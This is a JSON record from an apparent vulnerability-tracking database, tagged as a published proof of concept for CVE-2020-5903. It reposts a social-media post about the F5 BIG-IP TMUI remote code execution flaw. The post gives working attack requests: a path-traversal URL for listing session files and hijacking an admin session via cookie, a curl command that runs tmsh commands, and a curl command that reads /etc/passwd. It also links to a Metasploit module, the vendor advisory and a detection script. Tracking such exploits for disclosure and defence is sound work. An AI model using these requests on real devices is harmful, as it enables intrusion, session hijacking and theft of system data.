{"uuid": "2667699b-3911-44ed-9851-2e99592c0310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5903", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1378", "content": "#exploit\nF5 BigIP TMUI Critical RCE (CVE-2020-5902, CVE-2020-5903):\nhttps://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/\n]-> PoCs:\n1. https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4\n2. [https://{host}]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp \nthere you will see the session files like: \"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX\". \nSet this in the cookie and you are in admin's session...\n3. RCE\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n4. Read File\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'\n]-> Security Advisory:\nhttps://support.f5.com/csp/article/K52145254\n]-> A\u00a0quick NMAP script:\nhttps://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse", "creation_timestamp": "2024-11-02T15:23:24.000000Z"}